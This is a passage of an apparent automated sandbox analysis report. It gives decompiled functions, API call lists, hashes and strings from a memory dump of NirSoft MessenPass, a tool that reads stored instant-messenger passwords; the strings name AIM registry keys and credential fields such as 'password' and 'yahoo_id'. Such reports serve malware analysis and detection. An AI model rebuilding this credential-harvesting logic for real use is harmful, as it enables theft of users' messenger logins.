                                					return _t9;
                                				}
                                				return _t9;
                                 			}

                                APIs
                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
                                • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                • Instruction ID: d064f037d8cc498e3967daff6ff593c2326981cc2c3d102c7782d5cd9755b432
                                • Opcode Fuzzy Hash: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                • Instruction Fuzzy Hash: A5C00272A14B018FE7709E55D4057A6B3E4AF1073BF618C1DD4D591581D77CE5848E14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E004067D3(CHAR* _a4) {
                                				void* _t3;
                                
                                				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
                                				return _t3;
                                 			}

                                APIs
                                • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E004067BA(CHAR* _a4) {
                                				void* _t3;
                                
                                				_t3 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
                                				return _t3;
                                 			}

                                APIs
                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00404CE0(signed int* __esi) {
                                				struct HINSTANCE__* _t3;
                                				int _t4;
                                
                                				_t3 =  *__esi;
                                				__esi[1] = __esi[1] & 0x00000000;
                                				if(_t3 != 0) {
                                					_t4 = FreeLibrary(_t3); // executed
                                					 *__esi =  *__esi & 0x00000000;
                                					return _t4;
                                				}
                                				return _t3;
                                 			}

                                APIs
                                • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: EnumNamesResource
                                • String ID:
                                • API String ID: 3334572018-0
                                • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00407930(signed int* __esi) {
                                				int _t2;
                                				void* _t3;
                                
                                				_t3 =  *__esi;
                                				if(_t3 != 0xffffffff) {
                                					_t2 = FindClose(_t3); // executed
                                					 *__esi =  *__esi | 0xffffffff;
                                					return _t2;
                                				}
                                				return 0;
                                 			}

                                APIs
                                • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CloseFind
                                • String ID:
                                • API String ID: 1863332320-0
                                • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Open
                                • String ID:
                                • API String ID: 71445658-0
                                • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E004069D3(CHAR* _a4) {
                                				long _t4;
                                
                                				_t4 = GetFileAttributesA(_a4); // executed
                                				return 0 | _t4 != 0xffffffff;
                                 			}

                                APIs
                                • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                APIs
                                • strlen.MSVCRT ref: 00412B87
                                • _strncoll.MSVCRT ref: 00412B97
                                • memcpy.MSVCRT ref: 00412C13
                                • atoi.MSVCRT ref: 00412C24
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                • API String ID: 1864335961-3210201812
                                • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
                                • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 004117DE
                                • GetDlgItem.USER32(?,000003E8), ref: 004117EA
                                • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
                                • GetWindowLongA.USER32(?,000000F0), ref: 00411805
                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
                                • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
                                • GetWindowRect.USER32(00000000,?), ref: 0041182C
                                • GetWindowRect.USER32(?,?), ref: 00411837
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
                                • GetDC.USER32 ref: 00411892
                                • strlen.MSVCRT ref: 004118D2
                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
                                • ReleaseDC.USER32(?,?), ref: 00411930
                                • sprintf.MSVCRT ref: 004119F0
                                • SetWindowTextA.USER32(?,?), ref: 00411A04
                                • SetWindowTextA.USER32(?,00000000), ref: 00411A22
                                • GetDlgItem.USER32(?,00000001), ref: 00411A58
                                • GetWindowRect.USER32(00000000,?), ref: 00411A68
                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
                                • GetClientRect.USER32(?,?), ref: 00411A8D
                                • GetWindowRect.USER32(?,?), ref: 00411A97
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
                                • GetClientRect.USER32(?,?), ref: 00411AE7
                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                • String ID: %s:$EDIT$STATIC
                                • API String ID: 1703216249-3046471546
                                • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
                                • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • EndDialog.USER32(?,?), ref: 004105EE
                                • GetDlgItem.USER32(?,000003EA), ref: 00410606
                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
                                • memset.MSVCRT ref: 00410663
                                • memset.MSVCRT ref: 00410683
                                • memset.MSVCRT ref: 004106A1
                                • memset.MSVCRT ref: 004106BA
                                • memset.MSVCRT ref: 004106D8
                                • memset.MSVCRT ref: 004106F1
                                • GetCurrentProcess.KERNEL32 ref: 004106F9
                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
                                • memset.MSVCRT ref: 0041078F
                                • GetCurrentProcessId.KERNEL32 ref: 0041079D
                                • memcpy.MSVCRT ref: 004107CC
                                • _mbscpy.MSVCRT ref: 004107EE
                                • sprintf.MSVCRT ref: 00410859
                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
                                • GetDlgItem.USER32(?,000003EA), ref: 0041087C
                                • SetFocus.USER32(00000000), ref: 00410883
                                Strings
                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
                                • {Unknown}, xrefs: 00410668
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                • API String ID: 1428123949-3474136107
                                • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
                                • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 65%
                                			E0040B4F6(void* __ecx, void* __eflags) {
                                				void* __edi;
                                				void* __esi;
                                				struct HMENU__* _t115;
                                				struct HWND__* _t117;
                                				void* _t119;
                                				intOrPtr _t123;
                                				void* _t128;
                                				void* _t129;
                                				intOrPtr _t131;
                                				void* _t164;
                                				void* _t165;
                                				int _t170;
                                				void* _t171;
                                				void* _t172;
                                				void* _t176;
                                				void* _t185;
                                				void* _t195;
                                				void* _t196;
                                				intOrPtr _t198;
                                				intOrPtr _t199;
                                				void* _t200;
                                				intOrPtr* _t201;
                                				int _t203;
                                				intOrPtr* _t208;
                                				int* _t209;
                                				void* _t211;
                                				intOrPtr* _t212;
                                				void* _t214;
                                
                                				_t214 = __eflags;
                                				_t209 = _t211 - 0x78;
                                				_t212 = _t211 - 0xa0;
                                				_t165 = __ecx;
                                				 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
                                				 *(_t209 - 0x24) =  *(_t209 - 0x24) & 0x00000000;
                                				 *((char*)(_t209 - 0x20)) = 0;
                                				 *((char*)(_t209 - 0x1f)) = 1;
                                				 *((char*)(_t209 - 0x1e)) = 0;
                                				 *((char*)(_t209 - 0x1d)) = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				 *((intOrPtr*)(_t209 - 0x14)) = 6;
                                				 *((intOrPtr*)(_t209 - 0x10)) = 0x9c56;
                                				 *((char*)(_t209 - 0xc)) = 4;
                                				 *((char*)(_t209 - 0xb)) = 0;
                                				 *((char*)(_t209 - 0xa)) = 0;
                                				 *((char*)(_t209 - 9)) = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				 *_t209 = 1;
                                				_t209[1] = 0x9c41;
                                				_t209[2] = 4;
                                				_t209[2] = 0;
                                				_t209[2] = 0;
                                				_t209[2] = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				_t209[5] = 5;
                                				_t209[6] = 0x9c44;
                                				_t209[7] = 4;
                                				_t209[7] = 0;
                                				_t209[7] = 0;
                                				_t209[7] = 0;
                                				_t209[0x1b] = _t209[0x1b] | 0xffffffff;
                                				asm("stosd");
                                				asm("stosd");
                                				_t209[0xa] = 2;
                                				_t209[0xb] = 0x9c48;
                                				_t209[0xc] = 4;
                                				_t209[0xc] = 0;
                                				_t209[0xc] = 0;
                                				_t209[0xc] = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				_t209[0xf] = 3;
                                				_t209[0x10] = 0x9c49;
                                				_t209[0x11] = 4;
                                				_t209[0x11] = 0;
                                				_t209[0x11] = 0;
                                				_t209[0x11] = 0;
                                				asm("stosd");
                                				asm("stosd");
                                				_t209[0x14] = 4;
                                				_t209[0x15] = 0x9c42;
                                				_t209[0x16] = 4;
                                				_t209[0x16] = 0;
                                				_t209[0x16] = 0;
                                				_t209[0x16] = 0;
                                				asm("stosd");
                                				_t196 = 0x66;
                                				asm("stosd");
                                				_t115 = E00408A29(_t196);
                                				 *(__ecx + 0x11c) = _t115;
                                				SetMenu( *(__ecx + 0x108), _t115);
                                				_t117 =  *0x41502c(0x50000000, 0x417c88,  *(_t165 + 0x108), 0x101, _t185, _t195, _t164);
                                				 *(_t165 + 0x114) = _t117;
                                				SendMessageA(_t117, 0x404, 1,  &(_t209[0x1b]));
                                				_t119 = LoadImageA( *0x41dbd4, 0x68, 0, 0, 0, 0x9060);
                                				 *((intOrPtr*)(_t165 + 0x118)) =  *0x415044( *(_t165 + 0x108), 0x50010900, 0x102, 7, 0, _t119, _t209 - 0x28, 7, 0x10, 0x10, 0x70, 0x10, 0x14);
                                				E00403CB2( *((intOrPtr*)(_t165 + 0x390)), _t214, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t165 + 0x108), 0x103,  *0x41dbd4, 0), 1);
                                				_t123 =  *((intOrPtr*)(_t165 + 0x390));
                                				_t170 =  *(_t123 + 0x1b0);
                                				_t198 =  *((intOrPtr*)(_t123 + 0x1b4));
                                				_t209[0x1c] =  *(_t123 + 0x184);
                                				if(_t170 <= 0) {
                                					L3:
                                					_t199 =  *((intOrPtr*)(_t165 + 0x390));
                                					E0040AC28(_t199);
                                					 *0x415040( *((intOrPtr*)(_t199 + 0x18c)), 0);
                                					_t128 = E00407017(0x6d);
                                					_t171 = 0xffffff;
                                					_t129 =  *0x41503c( *((intOrPtr*)(_t199 + 0x18c)), _t128);
                                					if( *((intOrPtr*)(_t199 + 0x1b8)) != 0) {
                                						E0040AB96(_t129, _t171, 0, _t199);
                                					}
                                					_t200 = 0x68;
                                					 *((intOrPtr*)(_t165 + 0x170)) = E00408A29(_t200);
                                					_t131 =  *((intOrPtr*)(_t165 + 0x398));
                                					if( *((intOrPtr*)(_t131 + 0x30)) <= 0) {
                                						_t172 = 0x417c88;
                                					} else {
                                						if( *((intOrPtr*)(_t131 + 0x1c)) <= 0) {
                                							_t172 = 0;
                                						} else {
                                							_t172 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0xc)))) +  *((intOrPtr*)(_t131 + 0x10));
                                						}
                                					}
                                					0x413dce(_t172, "/noloadsettings");
                                					_t221 = _t131;
                                					if(_t131 == 0) {
                                						RegDeleteKeyA(0x80000001, "Software\NirSoft\MessenPass");
                                					}
                                					_t201 = _t165 + 0x38c;
                                					E0040D725( *_t201, _t221);
                                					E0040BBF0(_t165, 0);
                                					 *( *_t201 + 0x724) = 1;
                                					SetFocus( *( *((intOrPtr*)(_t165 + 0x390)) + 0x184));
                                					if( *0x41e678 == 0) {
                                						E004069FA(0x41e678);
                                						if((GetFileAttributesA(0x41e678) & 0x00000001) != 0) {
                                							GetTempPathA(0x104, 0x41e678);
                                						}
                                					}
                                					_t203 = strlen(0x41e678);
                                					 *_t212 = 0x4185dc;
                                					_t94 = strlen(??) + 1; // 0x1
                                					_t224 = _t203 + _t94 - 0x104;
                                					if(_t203 + _t94 >= 0x104) {
                                						 *((char*)(_t165 + 0x180)) = 0;
                                					} else {
                                						E00406B4B(_t165 + 0x180, 0x41e678, "report.html");
                                					}
                                					_push(1);
                                					_t176 = 0x30;
                                					E0040AD6F( *((intOrPtr*)(_t165 + 0x390)), _t176);
                                					E0040B4DB(_t165);
                                					 *((intOrPtr*)(_t165 + 0x394)) = RegisterClipboardFormatA("commdlg_FindReplace");
                                					E0040AFE6(_t176, _t165, _t224, 0);
                                					if(E004077AF( *((intOrPtr*)(_t165 + 0x398)), ?str?, 3) >= 0) {
                                						 *((intOrPtr*)( *((intOrPtr*)(_t165 + 0x390)) + 0x1c8)) = E00406D5A(E0040779F(_t148,  *((intOrPtr*)(_t165 + 0x398))) + 3);
                                					}
                                					_t209[0x19] = 0x12c;
                                					_t209[0x1a] = 0x400;
                                					SendMessageA( *(_t165 + 0x114), 0x404, 2,  &(_t209[0x19]));
                                					return SendMessageA( *(_t165 + 0x114), 0x401, 0x1001, 0);
                                				} else {
                                					_t208 = _t198 + 0xc;
                                					_t209[0x1d] = _t170;
                                					do {
                                						E00404E68( *((intOrPtr*)(_t208 + 4)),  *((intOrPtr*)(_t208 - 8)), _t209[0x1c],  *((intOrPtr*)(_t208 - 0xc)),  *((intOrPtr*)(_t208 - 4)),  *_t208);
                                						_t212 = _t212 + 0x10;
                                						_t208 = _t208 + 0x14;
                                						_t75 =  &(_t209[0x1d]);
                                						 *_t75 = _t209[0x1d] - 1;
                                					} while ( *_t75 != 0);
                                					goto L3;
                                				}
                                			}

                                APIs
                                  • Part of subcall function 00408A29: LoadMenuA.USER32(00000000), ref: 00408A31
                                  • Part of subcall function 00408A29: sprintf.MSVCRT ref: 00408A54
                                • SetMenu.USER32(?,00000000), ref: 0040B61C
                                • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040B64F
                                • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040B667
                                • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040B6C7
                                • _strcmpi.MSVCRT ref: 0040B799
                                • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MessenPass), ref: 0040B7AE
                                • SetFocus.USER32(?), ref: 0040B7E1
                                • GetFileAttributesA.KERNEL32(0041E678), ref: 0040B7FB
                                • GetTempPathA.KERNEL32(00000104,0041E678), ref: 0040B80B
                                • strlen.MSVCRT ref: 0040B812
                                • strlen.MSVCRT ref: 0040B820
                                • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040B86D
                                  • Part of subcall function 00404E68: strlen.MSVCRT ref: 00404E85
                                  • Part of subcall function 00404E68: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404EA9
                                • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040B8DD
                                • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040B8F0
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: MessageSend$strlen$LoadMenu$AttributesClipboardCreateDeleteFileFocusFormatImagePathRegisterTempWindow_strcmpisprintf
                                • String ID: /noloadsettings$/sm$Software\NirSoft\MessenPass$SysListView32$commdlg_FindReplace$report.html
                                • API String ID: 2862451953-3267067943
                                • Opcode ID: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                • Instruction ID: 58ee6bec69cc5a2ead352e1dc17fbc33d0493dc4f48ef93b1c15430ab04c662e
                                • Opcode Fuzzy Hash: ea6126f0ad9a3bdd701ee80c8346164e4811f452d9b02224669d18572419d2bb
                                • Instruction Fuzzy Hash: 4FC1F271500244EFEB129F64C84ABDA7FA5EF54708F04407EFA446F2D2CBB95944CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040F94E: SetFilePointer.KERNEL32(0040F292,?,00000000,00000000,00418AF8,00000000,?,?,0040F8C4,?,00000000,?,74B5F560), ref: 0040F968
                                  • Part of subcall function 0040F94E: memset.MSVCRT ref: 0040F973
                                • _strcmpi.MSVCRT ref: 0040F729
                                • _strcmpi.MSVCRT ref: 0040F740
                                • _strcmpi.MSVCRT ref: 0040F757
                                • _strcmpi.MSVCRT ref: 0040F76E
                                • _strcmpi.MSVCRT ref: 0040F792
                                • _strcmpi.MSVCRT ref: 0040F7A6
                                • _strcmpi.MSVCRT ref: 0040F7BA
                                • _strcmpi.MSVCRT ref: 0040F7CE
                                • _strcmpi.MSVCRT ref: 0040F7E2
                                • _mbscpy.MSVCRT ref: 0040F831
                                • _strcmpi.MSVCRT ref: 0040F843
                                • _mbscpy.MSVCRT ref: 0040F88E
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp
                                Similarity
                                • API ID: _strcmpi$_mbscpy$FilePointermemset
                                • String ID: LoginName$UIN$e-mail$gg_1$icq$icq_1$password$yahoo_id
                                • API String ID: 3770779768-1670397801
                                • Opcode ID: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                • Instruction ID: 0cc2e13a8e56b2c188e74045540a3fe2ab2ea4ed6cca8b10f1d7ecee0d286665
                                • Opcode Fuzzy Hash: 35a2a10a4a641d2086cb2dbdba6566c00143c3982c3012e31156ad73f44fce61
                                • Instruction Fuzzy Hash: 795177725043096EEB21DAA2DC81EEA73AC9F04715F60447FF505E25C1EB38EB89879D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 48%
                                			E0040244D(short* _a4, short* _a8) {
                                				char _v5;
                                				char _v6;
                                				char _v7;
                                				char _v8;
                                				char _v9;
                                				char _v10;
                                				char _v11;
                                				char _v12;
                                				char _v13;
                                				char _v14;
                                				char _v15;
                                				char _v16;
                                				char _v17;
                                				char _v18;
                                				char _v19;
                                				char _v20;
                                				char _v21;
                                				char _v22;
                                				char _v23;
                                				char _v24;
                                				char _v25;
                                				char _v26;
                                				char _v27;
                                				char _v28;
                                				char _v29;
                                				char _v30;
                                				char _v31;
                                				char _v32;
                                				char _v33;
                                				char _v34;
                                				char _v35;
                                				char _v36;
                                				char _v37;
                                				char _v38;
                                				char _v39;
                                				char _v40;
                                				char _v41;
                                				char _v42;
                                				char _v43;
                                				char _v44;
                                				char _v45;
                                				char _v46;
                                				char _v47;
                                				char _v48;
                                				char _v49;
                                				char _v50;
                                				char _v51;
                                				char _v52;
                                				char _v53;
                                				char _v54;
